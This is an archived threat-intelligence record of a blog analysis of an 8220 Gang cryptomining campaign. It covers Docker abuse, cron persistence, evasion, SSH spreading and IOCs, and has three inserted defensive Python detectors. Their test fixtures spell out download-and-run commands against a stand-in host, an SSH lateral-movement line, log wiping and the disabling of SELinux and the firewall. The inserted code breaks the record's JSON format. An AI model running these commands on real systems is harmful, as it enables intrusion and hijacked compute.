{
	"id": "62ae61bb-9f61-4193-8593-27c666f420f8",
	"created_at": "2026-04-06T00:10:27.665378Z",
	"updated_at": "2026-04-10T13:12:13.902029Z",
	"deleted_at": null,
	"sha1_hash": "72e2479bbb5eea0128fb8ca309856be3abd56f26",
	"title": "8220 Gang Deploys a New Campaign with Upgraded Techniques",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4683065,
	"plain_text": "8220 Gang Deploys a New Campaign with Upgraded Techniques\r\nBy Nitzan Yaakov. Nitzan was a Security Data Analyst on the Aqua Nautilus research team.\r\nPublished: 2022-07-07 · Archived: 2026-04-02 11:18:23 UTC\r\nA recent campaign by the 8220 gang, a group known to exploit the newly disclosed critical Confluence vulnerability (CVE-2022-26134), targeted one of our honeypots. The campaign has evolved over time to deliberately target containers. In this game of cat and mouse, the threat actors used some new techniques, reusing and refurbishing scripts from one attack to the next, adding new capabilities to attack the compromised host, and spreading the attack to additional hosts. In this blog, we break down the attack, review its techniques, and analyze it using a runtime detection and prevention tool.\r\nHere's what we're going to cover:\r\nInitial access\r\nExecution and persistence techniques\r\nDefense evasion techniques\r\nDiscovery techniques\r\nLateral movement techniques\r\nCommand and control techniques\r\nImpact techniques\r\nThe malware execution\r\nDetecting the attack\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 1 of 20\r\nFigure 1: Jira?Confluence attack flow (8220 Gang)\r\nInitial access\r\nIn this attack, the threat actors exploited a misconfigured Docker daemon to run a vanilla Alpine image with a malicious command. The command consists of several attempts, using different download tools, to fetch the shell script jira?confluence from a remote server. This command-and-control (C2) server was used by the attackers throughout the whole attack.\r\nThe name of the shell script is interesting because it recalls the June disclosure of a new vulnerability that allows remote code execution on Confluence servers. The vulnerability was added to the National Vulnerability Database (NVD) as CVE-2022-26134. 
It affects several versions of Confluence Server and Data Center, allowing an unauthenticated attacker to execute arbitrary code on vulnerable instances.\r\nDuring our investigation, we found similarities (beyond the suggestive name) in both code and artifacts between attacks that exploited the Confluence vulnerability and the attack caught by our honeypots. The functions in the code, the binaries, and the C2 infrastructure are most commonly associated with the 8220 gang.\r\nThe container command executed on our honeypot is particularly interesting because it embeds a snippet that materializes a download function as a fallback, in case the download tools present on the target host fail to fetch the main payload from the C2 server.\r\nFigure 2: Running a vanilla container image with a command\r\nAs the screenshot shows, the attackers run alpine with a command. They change the root directory with chroot /mnt, so that everything that follows runs against whatever filesystem is mounted at /mnt (on an abused Docker daemon this is typically the host's root filesystem), and then try three ways of downloading a remote file (curl, wget, and lwp-download). The last is less well known; it ships with Perl's libwww (LWP) and is intended for downloading large files. As a fallback, the command also creates a temporary directory /tmp/jira, writes a base64-encoded snippet there, then decodes and executes it.\r\nFigure 3: Decoded base64\r\nThe screenshot above shows the decoded snippet that appeared in the command. The attacker deletes a temporary file /var/tmp/.dat and writes a function intended to replace curl or wget, that is, to download files from the web. 
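The container command described above is what an exposed Docker daemon receives as a container-create request, and that request is the point at which a gate in front of the API could have stopped the attack. The following Python check is an added example, not code from this post or from Aqua: it inspects a request using the Docker Engine API field names Image, Cmd, HostConfig.Binds and HostConfig.Privileged, and flags a chroot into a bind-mounted host path, anything piped straight into a shell, and a base64-decoded payload. Both requests are constructed for the example; the URL and the encoded snippet (which decodes to rm -f /var/tmp/.dat) are illustrative, not the attacker's real values.

```python
import shlex
from typing import Any, Dict, List

# Host paths that hand the host over when bind-mounted into a container.
SENSITIVE_HOST_PATHS = {'/', '/etc', '/root', '/proc', '/var/run/docker.sock'}
DOWNLOADERS = {'curl', 'wget', 'lwp-download'}
SHELLS = {'sh', 'bash', 'ash', 'dash'}


def bind_map(host_config: Dict[str, Any]) -> Dict[str, str]:
    # Engine API Binds entries are host_path:container_path[:options];
    # return container_path -> host_path.
    out: Dict[str, str] = {}
    for entry in host_config.get('Binds', []) or []:
        parts = entry.split(':')
        if len(parts) >= 2:
            out[parts[1]] = parts[0]
    return out


def command_tokens(cmd: Any) -> List[str]:
    # Cmd is a list in the API; a nested sh -c string is tokenised again so
    # that pipes and program names inside it become visible. With
    # punctuation_chars set, shlex emits | || ( ) ; as separate tokens.
    words = [cmd] if isinstance(cmd, str) else list(cmd or [])
    tokens: List[str] = []
    for word in words:
        lex = shlex.shlex(word, posix=True, punctuation_chars=True)
        lex.whitespace_split = True
        tokens.extend(list(lex))
    return tokens


def assess_request(req: Dict[str, Any]) -> List[str]:
    # Returns human-readable findings; an empty list means nothing suspicious.
    findings: List[str] = []
    host_config = req.get('HostConfig', {}) or {}
    binds = bind_map(host_config)
    if host_config.get('Privileged'):
        findings.append('privileged container requested')
    for container_path, host_path in binds.items():
        if host_path in SENSITIVE_HOST_PATHS:
            findings.append(f'host path {host_path} bind-mounted at {container_path}')
    toks = command_tokens(req.get('Cmd'))
    for i, tok in enumerate(toks):
        nxt = toks[i + 1] if i + 1 < len(toks) else ''
        # chroot into a directory that is a bind mount of a sensitive host path
        if tok == 'chroot' and binds.get(nxt) in SENSITIVE_HOST_PATHS:
            findings.append(f'chroot into host filesystem via {nxt}')
        # anything piped straight into an interpreter is download-and-execute
        if tok == '|' and nxt in SHELLS:
            findings.append('pipe into shell: ' + ' '.join(toks[max(0, i - 3):i + 2]))
        if tok == 'base64' and '-d' in toks[i + 1:i + 3]:
            findings.append('base64-encoded payload decoded in command')
    if DOWNLOADERS & set(toks) and SHELLS & set(toks):
        findings.append('downloader and shell interpreter in the same command')
    return findings


def should_block(req: Dict[str, Any]) -> bool:
    return bool(assess_request(req))


# Constructed request mirroring the honeypot command described in the post:
# stock Alpine, host root bind-mounted at /mnt, chroot into it, three
# downloaders tried in turn, then a base64 fallback. URL is illustrative.
MALICIOUS_REQUEST = {
    'Image': 'alpine:latest',
    'Cmd': ['sh', '-c',
            'chroot /mnt sh -c (curl -fsSL http://198.51.100.7/jira || '
            'wget -q -O - http://198.51.100.7/jira || '
            'lwp-download http://198.51.100.7/jira /tmp/jira/x) | sh ; '
            'mkdir -p /tmp/jira ; echo cm0gLWYgL3Zhci90bXAvLmRhdA== | base64 -d | sh'],
    'HostConfig': {'Binds': ['/:/mnt'], 'Privileged': False},
}

# Constructed benign request: read-only data volume, no downloads.
BENIGN_REQUEST = {
    'Image': 'alpine:latest',
    'Cmd': ['sh', '-c', 'ls /data ; echo done'],
    'HostConfig': {'Binds': ['/srv/data:/data:ro']},
}

if __name__ == '__main__':
    for label, req in (('malicious', MALICIOUS_REQUEST), ('benign', BENIGN_REQUEST)):
        print(label, 'block' if should_block(req) else 'allow', assess_request(req))
```

The image name alone (alpine:latest) carries no signal, which is the point the conclusion of this post makes: the decision has to be made on the bind mounts and the command, not on the image.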
Figure 4 shows the code written to /var/tmp/.dat:\r\nFigure 4: download function (from jira?confluence shell script)\r\nThis last snippet is the materialized download function, serving as a fallback in case curl, wget, and lwp-download all fail.\r\nExecution and persistence techniques\r\nThe main payload in this attack is the jira?confluence shell script, which in our case runs inside the container. The attacker creates cron jobs to trigger the execution of the malicious shell script, and adds a fallback function as a backup to the cron job to guarantee that the malicious code runs on the compromised machine.\r\nUltimately, the threat actor tries to create several cron jobs in various locations, each of which downloads the main payload from the C2 server and executes it. The entries' names and locations are randomized, and the script is arranged to start automatically at boot, so it keeps running even if the attack is detected and stopped.\r\nFigure 5: makecron function (from jira?confluence shell script)\r\nAs the screenshot below shows, the threat actor uses another function, cronbackup, as a backup to the cron job, reflecting the attacker's goal of maintaining a foothold on the target machine.\r\nFigure 6: cronbackup function (from jira?confluence shell script)\r\nThis fallback function checks whether cron, crond, and atd are active. If either of the first two is running, the function ends. If neither is running but atd is, the script schedules an invocation of the payload through at instead. 
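The persistence described above leaves the same download-and-execute command in several cron locations at once, which is something a defender can hunt for directly on disk. The Python below is an added example, not code from this post or from Aqua: it walks a snapshot of the cron-related files (path to content), parses system and per-user crontab formats, and reports entries that fetch from the network into a shell, run from a temporary directory, run at boot or every few minutes, and, as a separate signal, the same command planted in more than one location. The snapshot and the URL are constructed for the example.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# Where cron and run-parts look for jobs; /var/spool/cron/ covers both the
# RHEL layout (/var/spool/cron/<user>) and Debian (/var/spool/cron/crontabs/<user>).
CRON_PREFIXES = ('/etc/cron.d/', '/etc/cron.hourly/', '/var/spool/cron/')
DOWNLOADERS = ('curl ', 'wget ', 'lwp-download ')
TEMP_DIRS = ('/tmp/', '/var/tmp/', '/dev/shm/')

Hit = Tuple[str, str, str, List[str]]  # (path, schedule, command, reasons)


def is_cron_source(path: str) -> bool:
    return path == '/etc/crontab' or path.startswith(CRON_PREFIXES)


def split_entry(path: str, line: str) -> Tuple[str, str]:
    # /etc/crontab and /etc/cron.d/* carry a user field after the schedule;
    # per-user spool files do not; cron.hourly files are plain scripts.
    if path.startswith('/etc/cron.hourly/'):
        return ('hourly', line)
    fields = line.split()
    n = 1 if fields[0].startswith('@') else 5
    if path == '/etc/crontab' or path.startswith('/etc/cron.d/'):
        n += 1
    return (' '.join(fields[:n]), ' '.join(fields[n:]))


def entry_reasons(schedule: str, command: str) -> List[str]:
    reasons: List[str] = []
    cmd = command.lower()
    piped = any(p in cmd for p in ('| sh', '|sh', '| bash', '|bash'))
    if any(d in cmd for d in DOWNLOADERS) and piped:
        reasons.append('downloads and pipes into a shell')
    if any(t in cmd for t in TEMP_DIRS):
        reasons.append('runs from a temporary directory')
    if schedule.startswith('@reboot'):
        reasons.append('runs at boot')
    elif schedule.startswith('*/'):
        reasons.append('runs every ' + schedule.split()[0][2:] + ' minutes')
    return reasons


def hunt(files: Dict[str, str]) -> List[Hit]:
    hits: List[Hit] = []
    locations = defaultdict(set)  # command -> set of paths it was found in
    for path in sorted(files):
        if not is_cron_source(path):
            continue
        for raw in files[path].splitlines():
            line = raw.strip()
            if not line or line.startswith('#') or '=' in line.split()[0]:
                continue  # blank, comment, or VAR=value line
            schedule, command = split_entry(path, line)
            reasons = entry_reasons(schedule, command)
            if reasons:
                hits.append((path, schedule, command, reasons))
                locations[command].add(path)
    # The script seeds the same payload in several places; that alone is a signal.
    for command, paths in locations.items():
        if len(paths) > 1:
            hits.append(('(multiple)', '-', command,
                         [f'same command planted in {len(paths)} locations']))
    return hits


PAYLOAD = '(curl -fsSL http://198.51.100.7/jira || wget -q -O - http://198.51.100.7/jira) | sh'

# Constructed snapshot of a compromised host's cron files (path -> content).
SAMPLE_FILES = {
    '/etc/crontab': '''SHELL=/bin/sh
PATH=/usr/bin:/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/10 * * * * root {p}
'''.format(p=PAYLOAD),
    '/etc/cron.d/sysstat': '5-55/10 * * * * root command -v debian-sa1 > /dev/null && debian-sa1 1 1',
    '/etc/cron.hourly/.x': '''#!/bin/sh
/tmp/jira/x
''',
    '/var/spool/cron/root': '''@reboot {p}
*/10 * * * * {p}
'''.format(p=PAYLOAD),
    '/var/spool/cron/crontabs/root': '*/10 * * * * {p}'.format(p=PAYLOAD),
    '/etc/hostname': 'web-01',
}

if __name__ == '__main__':
    for path, schedule, command, reasons in hunt(SAMPLE_FILES):
        print(path, '|', schedule, '|', command, '|', ', '.join(reasons))
```

On a live host, read the same paths from the root filesystem (and the at spool, which this example does not parse) into the dictionary; the stock sysstat entry is included to show that ordinary periodic jobs produce no hit.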
Lastly, if none of cron, crond, or atd is active, the attacker falls back to an infinite loop that executes the payload every five minutes from one of four paths, chosen at random.\r\nDefense evasion techniques\r\nHere the attacker shuts down the security agents of Alibaba Cloud, Baidu Cloud, and Google Cloud Platform (GCP) to evade detection and improve the odds of a successful attack.\r\nFigure 7: run function (from jira?confluence shell script)\r\nTwo interesting functions are judge and judge2, which run the malware while checking that it is not being blocked by the target system. We return to them in the malware execution section.\r\nFigure 8: judge and judge2 functions (from jira?confluence shell script)\r\nThe attacker also uses several further defense evasion techniques. These include disabling the Uncomplicated Firewall (UFW) and adding iptables rules to guarantee inbound and outbound traffic to and from the C2 servers. The attacker also switches SELinux to permissive mode with setenforce 0, after which policy violations are only logged rather than blocked. 
SELinux is a Linux security module that enforces mandatory access control policies.\r\nFigure 9: Defense evasion techniques (from jira?confluence shell script)\r\nAdditionally, the attacker strips two attributes from the /etc/ld.so.preload file:\r\nthe immutable attribute, which prevents the file from being modified at all\r\nthe append-only attribute, which allows the file to be opened for writing only in append mode\r\nThe attacker then empties /etc/ld.so.preload, most likely to unload any security component configured to be loaded before all other shared libraries.\r\nAfter the shell script is downloaded to the compromised machine, it is saved in the /tmp directory, probably to avoid detection by agentless solutions that are blind to files written to /tmp and to memory. The attacker also changes the directory permissions so that every user has read, write, and execute access.\r\nThe attacker also checks whether outbound communication is blocked by a firewall or another security component: first, by pinging a C2 server hidden behind a domain name (jira[.]letmaker[.]top); if the domain name is blocked, the attacker uses the IP address directly. 
Second, by resolving the cryptomining pool through DNS; if the resolution is blocked, the malware is started with a flag that tells it so.\r\nFigure 10: Checking communication towards C2 server \u0026 cryptomining pool (from jira?confluence shell script)\r\nLastly, the attacker deletes log files to hide suspicious activity on the system:\r\ncron logs\r\nthe wtmp file, which holds the history of all logins and logouts\r\nthe secure log (on RHEL-family systems /var/log/secure), which records authentication and authorization events\r\n/var/spool/mail/root, where the output of cron tasks that ran during the attack is mailed to the root user\r\nFigure 11: Logs deletion (from jira?confluence shell script)\r\nDiscovery techniques\r\nIn this scenario, the threat actor runs several scanners to find further targets on the local network, then either brute-forces their SSH service or reuses SSH keys collected from the current target to get into them.\r\nIn the screenshot below, the scan function downloads three components, masscan, spirit, and px, to brute-force the SSH service in the local environment. With masscan, a fast port scanner, the threat actor scans 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 for hosts with SSH open on port 22.\r\nThe ASCII files px and pasx (not in the screenshot) serve as configuration files for the binaries spirit and spirit-pro. 
We examine the SSH brute force later, in the malware execution section.\r\nFigure 12: Scan function (from jira?confluence shell script)\r\nThe attacker also selects the binary to fetch from the C2 according to the target's processor architecture, obtained with uname -m.\r\nLateral movement techniques\r\nThe attacker then propagates the attack to additional hosts, harnessing the components downloaded earlier to move the malicious code through the compromised machine's internal environment.\r\nThe attacker tries to spread in two ways. In the first, after discovering hosts with an open SSH port, the attacker brute-forces SSH on those hosts; on success, the malicious shell script is executed there and the spread continues.\r\nIn the second, the attacker abuses previous connections between the compromised machine and remote hosts. Evidence of these connections is found in various files on the host, for example the known_hosts file of previous SSH connections. Such connections authenticate with an SSH key pair: a private key stored on the compromised host whose public half is authorized on the remote one. The attacker collects everything the compromised host stores that is needed to reconnect, namely the remote hosts' details and the SSH private keys that pair the machines.\r\nThe attacker creates a loop that generates all combinations of keys, hosts, and users. 
When the details are correct, the attacker establishes the connection to the remote host:\r\nHe makes each key file readable only by its owner, removing all other permissions, since ssh refuses to use private keys with looser permissions.\r\nHe changes how host keys are checked (StrictHostKeyChecking), so the remote host's key is added to known_hosts automatically even when it is not yet known.\r\nHe enables BatchMode, so ssh never prompts for a password or passphrase; a key-based login either succeeds unattended or fails immediately.\r\nFinally, the attacker executes the malicious shell script on the remote host, spreading the attack.\r\nFigure 13: localgo function (from jira?confluence shell script)\r\nCommand-and-control techniques\r\nThe attacker may also set up communication channels with the C2 to extend control over the compromised machine, for example by initiating a reverse shell over the C2 connection to gain remote access.\r\nThe attacker also determines whether the Tsunami malware is already running on the machine by checking for a connection to the IRC server (51[.]255[.]171[.]23). If no such connection exists, Tsunami is downloaded and executed. The IP address 51[.]255[.]171[.]23 is marked as malicious and has been identified in a campaign exploiting the recent Confluence vulnerability CVE-2022-26134. We look at how the Tsunami malware works later in the blog.\r\nFigure 14: Checking availability of IRC protocol (from jira?confluence shell script)\r\nImpact techniques\r\nAll the techniques used throughout the attack serve the attackers' ultimate goal: using the machine's CPU to mine cryptocurrency.\r\nThe attacker modifies sysctl settings to enable HugePages, a feature that lets the operating system use memory pages larger than the default. 
This can raise the miner's hash rate (mining speed) by 20-30%.\r\nFigure 15: Modifying kernel parameters (from jira?confluence shell script)\r\nThe malware execution\r\nThe techniques reviewed above laid the foundations for executing the attack. In this section, we examine the binaries and files and their roles. The artifacts are the first downloads made by the judge() and judge2() functions; the attacker selects the download according to the machine's architecture so that it runs properly.\r\nFirst, the attacker downloads a UPX-packed malware named dbused (md5 eb2f5e1b8f818cf6a7dafe78aea62c93 and md5 780965bad574e4e7f04433431d0d8f63). It is a cryptominer associated with the 8220 gang.\r\nNext, the attacker downloads the bashirc file (md5 63a86932a5bad5da32ebd1689aa814b3 and md5 0ba9e6dcfc7451e386704b2846b7e440), known as the Tsunami malware, a Linux backdoor that gives remote access to the infected machine. Tsunami is controlled over the Internet Relay Chat (IRC) protocol and acts as a client for distributed denial of service (DDoS) attacks on targeted systems, so it is classified as an IRC bot.\r\nTo find related machines and infect them as well, the attacker runs the scan function, which downloads the following tools from the remote server:\r\nspirit binary (md5 cba8efad5eda067ef9d10d372a9a9cab and md5 9a934b00a07847c66b9ddf7268b07dd3)\r\npx text file\r\nmasscan binary (md5 eefc0ce93d254982fbbcd26460f3d10d)\r\nThe attackers look for more vulnerable machines on the same network as the infected one: scanning the internal network with masscan, they search for open SSH ports (22). 
With the resulting host list, the spirit binary, a UPX-packed file, works as an SSH scanner and uses the px text file, which holds more than 10,000 username and password records, to brute-force the vulnerable hosts found on the same network, spreading the attack and infecting them too.\r\nThe attacker also tries to spread to remote hosts using the SSH keys and host records of previous connections made from the infected machine. Once a connection is established, the malicious shell script is executed there and those machines are infected as well.\r\nOver the past few days we examined several changes the attackers made to the script. They added more functions that let them hide malicious activity and launch the attack more reliably.\r\nThe jira?confluence shell script, which initiates the attack on the compromised machine, was updated with the following new components:\r\nUsers and passwords file: the px file was replaced by the pasx file (md5 3cd845610e49e11575b5c18596b38389).\r\nSSH scanner: the spirit scanner was replaced by spirit-pro (md5 389437dc4db73256913b8d89fab5e7bc and md5 7d72ccaf59619d0011ca02f97ecb1170).\r\nSSH brute-force tool: a new tool called hxx was added (md5 f0551696774f66ad3485445d9e3f7214); it performs SSH brute-force attacks and has been linked to the 8220 gang.\r\nDetecting the attack\r\nThe story behind this campaign is simple. When a new critical zero-day vulnerability is disclosed, malicious actors rush to exploit it as quickly as possible, and your production workloads are immediately at risk. You have to go over them one by one to evaluate whether they are vulnerable and exploitable. 
Attackers, however, only need to tweak their tools and add the new exploit to their massive botnets. You might lose this race.\r\nRuntime detection and response tools such as Aqua's Cloud Native Detection and Response (CNDR) are built to detect malicious or suspicious behavior at runtime.\r\nIf one of your running workloads is vulnerable to the Confluence vulnerability, CNDR shows the following detections:\r\nFigure 16: Aqua CNDR dashboard\r\nLet's start with the dashboard. It shows that over the last hour we had various detections in our environment. Moving on to the incident screen, we see these nine detections:\r\nInspecting them, we find that they line up with the attack described above.\r\nFigure 18: Examples of CNDR detections\r\nWe can easily reconstruct the attack kill chain. This can be a hard task during incident response, but CNDR lets us go over the attack step by step:\r\nFigure 19: Attack kill chain\r\nMapping these campaigns to the MITRE ATT\u0026CK framework\r\nHere we map each component of the attack to the corresponding techniques of the MITRE ATT\u0026CK framework:\r\nConclusion\r\nThis attack highlights the continuous evolution of attackers, who keep adding new techniques to bypass security tools, expand the attack to additional hosts, and amplify its impact. 
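The detections and the ATT&CK mapping above come from process-execution telemetry, the kind of event a runtime sensor such as CNDR emits for every exec on the host. The Python rule set below is an added example, not Aqua's code, its detection logic, or its mapping table: it classifies constructed exec events, built to mirror the script behaviour described in this post, into the ATT&CK techniques this script exhibits. The technique IDs are assigned here rather than taken from the post, the C2 address and key path are illustrative, and the cloud agent service names are assumptions.

```python
from typing import Callable, Dict, List, Tuple

DOWNLOADERS = ('curl ', 'wget ', 'lwp-download ')
LOG_FILES = ('/var/log/wtmp', '/var/log/btmp', '/var/log/lastlog', '/var/log/secure',
             '/var/log/auth.log', '/var/log/cron', '/var/spool/mail/root')
# Assumed service names for the cloud security agents the post mentions
# (Alibaba Cloud, Baidu Cloud, GCP); adjust to what your fleet actually runs.
CLOUD_AGENTS = ('aliyun', 'aegis', 'bcm-agent', 'google-cloud-ops-agent', 'stackdriver-agent')

# (rule name, ATT&CK technique id, predicate over (tokens, raw cmdline))
Rule = Tuple[str, str, Callable[[List[str], str], bool]]

RULES: List[Rule] = [
    ('download piped into a shell', 'T1105',
     lambda t, c: any(d in c for d in DOWNLOADERS) and ('| sh' in c or '| bash' in c)),
    ('cloud security agent stopped', 'T1562.001',
     lambda t, c: t[0] in ('systemctl', 'service') and 'stop' in t
     and any(a in c for a in CLOUD_AGENTS)),
    ('SELinux switched to permissive', 'T1562.001',
     lambda t, c: t[:2] == ['setenforce', '0']),
    ('ld.so.preload attributes stripped or file cleared', 'T1562.001',
     lambda t, c: '/etc/ld.so.preload' in t and t[0] in ('chattr', 'rm', 'truncate')),
    ('host firewall disabled or opened', 'T1562.004',
     lambda t, c: t[:2] == ['ufw', 'disable'] or (t[0] == 'iptables' and 'ACCEPT' in t)),
    ('system logs cleared', 'T1070.002',
     lambda t, c: t[0] == 'rm' and any(p in t for p in LOG_FILES)),
    ('internal SSH port sweep', 'T1046',
     lambda t, c: t[0] == 'masscan' and '-p22' in t),
    ('unattended key-based SSH with host-key check disabled', 'T1021.004',
     lambda t, c: t[0] == 'ssh' and '-i' in t
     and '-oStrictHostKeyChecking=no' in t and '-oBatchMode=yes' in t),
    ('huge pages enabled for the miner', 'T1496',
     lambda t, c: t[0] == 'sysctl' and any(x.startswith('vm.nr_hugepages=') for x in t)),
]


def classify(cmdline: str) -> List[Tuple[str, str]]:
    # Returns the (rule name, technique id) pairs matching one exec event.
    t = cmdline.split()
    if not t:
        return []
    return [(name, tid) for name, tid, pred in RULES if pred(t, cmdline)]


def map_events(events: List[Dict[str, object]]) -> List[Tuple[int, str, str, str]]:
    out: List[Tuple[int, str, str, str]] = []
    for ev in events:
        cmdline = str(ev['cmdline'])
        for name, tid in classify(cmdline):
            out.append((int(ev['pid']), tid, name, cmdline))
    return out


def technique_counts(events: List[Dict[str, object]]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for _, tid, _, _ in map_events(events):
        counts[tid] = counts.get(tid, 0) + 1
    return counts


# Constructed exec events mirroring the script behaviour described in the post.
EVENTS: List[Dict[str, object]] = [
    {'pid': 4101, 'cmdline': 'sh -c (curl -fsSL http://198.51.100.7/jira || wget -q -O - http://198.51.100.7/jira) | sh'},
    {'pid': 4102, 'cmdline': 'systemctl stop aliyun.service'},
    {'pid': 4103, 'cmdline': 'ufw disable'},
    {'pid': 4104, 'cmdline': 'iptables -I INPUT -s 198.51.100.7 -j ACCEPT'},
    {'pid': 4105, 'cmdline': 'setenforce 0'},
    {'pid': 4106, 'cmdline': 'chattr -ia /etc/ld.so.preload'},
    {'pid': 4107, 'cmdline': 'rm -rf /var/log/wtmp /var/log/secure /var/log/cron /var/spool/mail/root'},
    {'pid': 4108, 'cmdline': 'masscan 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 -p22 --rate 10000'},
    {'pid': 4109, 'cmdline': 'ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i /root/.ssh/id_rsa root@10.0.0.12 curl -fsSL http://198.51.100.7/jira | sh'},
    {'pid': 4110, 'cmdline': 'sysctl -w vm.nr_hugepages=128'},
    {'pid': 4111, 'cmdline': 'ls -la /tmp'},
    {'pid': 4112, 'cmdline': 'crond -n'},
]

if __name__ == '__main__':
    for pid, tid, name, cmdline in map_events(EVENTS):
        print(pid, tid, name, '<-', cmdline)
    print(technique_counts(EVENTS))
```

Each rule is deliberately narrow and keyed on the exact command shape the script uses, so a benign ls or the cron daemon itself produces nothing; the lateral-movement event is tagged twice (SSH and ingress tool transfer) because it performs both, which is the behaviour the kill chain in Figure 19 shows as separate steps.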
Within just a few days, the shell script we have been investigating gained new features and binaries, improvements designed to spread the attack more efficiently across the local network and to remote hosts.\r\nAttacks like this are growing in both number and sophistication, bringing new capabilities and tools. To protect against them, we recommend the following guidelines:\r\nConfigure your environment properly and avoid exposing unnecessary ports (in this case, the Docker daemon's API).\r\nFollow security announcements and update your systems to the latest releases.\r\nMonitor container activity to mitigate issues quickly and minimize disruption. This also applies to the runtime environment, where suspicious activity can occur.\r\nIn our case, the attack was initiated with the vanilla image alpine:latest, which most organizations use and allow to run in their environments. Runtime protection solutions such as Aqua's CNDR are built to detect unknown threats and suspicious behavior at runtime. 
Moreover, drift prevention would have blocked the execution of a file that was downloaded from a remote source at runtime and was not part of the original container image.\r\nIndicators of Compromise (IOCs)\r\nName              Type          MD5\r\ndbuser (x86_64)   Binary        eb2f5e1b8f818cf6a7dafe78aea62c93\r\ndbuser (i686)     Binary        780965bad574e4e7f04433431d0d8f63\r\nbashirc (x86_64)  Binary        63a86932a5bad5da32ebd1689aa814b3\r\nbashirc (i686)    Binary        0ba9e6dcfc7451e386704b2846b7e440\r\nspirit (upx)      Binary        cba8efad5eda067ef9d10d372a9a9cab\r\nspirit            Binary        9a934b00a07847c66b9ddf7268b07dd3\r\nspirit-pro (upx)  Binary        389437dc4db73256913b8d89fab5e7bc\r\nspirit-pro        Binary        7d72ccaf59619d0011ca02f97ecb1170\r\nhxx               Binary        f0551696774f66ad3485445d9e3f7214\r\nmasscan           Binary        eefc0ce93d254982fbbcd26460f3d10d\r\npx                Text file     26935a6763559c954cd247efcfa71a47\r\npasx              Text file     3cd845610e49e11575b5c18596b38389\r\njira?confluence   Shell script  ed325c84233a432e06a548c131a91a69\r\nIPs and domains\r\n51[.]255[.]171[.]23\r\n89[.]34[.]27[.]167\r\n167[.]114[.]114[.]169\r\njira[.]letmaker[.]top\r\nSource: https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134"
	],
	"report_names": [
		"8220-gang-confluence-vulnerability-cve-2022-26134"
	],
	"threat_actors": [
		{
			"id": "0b8ea9bb-b729-438a-ae1f-4240db936fd7",
			"created_at": "2023-06-23T02:04:34.839947Z",
			"updated_at": "2026-04-10T02:00:04.99239Z",
			"deleted_at": null,
			"main_name": "8220 Gang",
			"aliases": [
				"8220 Mining Group",
				"Returned Libra",
				"Water Sigbin"
			],
			"source_name": "ETDA:8220 Gang",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "942c5fbc-31df-4aef-8268-e3ccf6692ec8",
			"created_at": "2024-07-09T02:00:04.434476Z",
			"updated_at": "2026-04-10T02:00:03.671196Z",
			"deleted_at": null,
			"main_name": "Water Sigbin",
			"aliases": [
				"8220 Gang"
			],
			"source_name": "MISPGALAXY:Water Sigbin",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434227,
	"ts_updated_at": 1775826733,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/72e2479bbb5eea0128fb8ca309856be3abd56f26.pdf",
		"text": "https://archive.orkl.eu/72e2479bbb5eea0128fb8ca309856be3abd56f26.txt",
		"img": "https://archive.orkl.eu/72e2479bbb5eea0128fb8ca309856be3abd56f26.jpg"
	}
}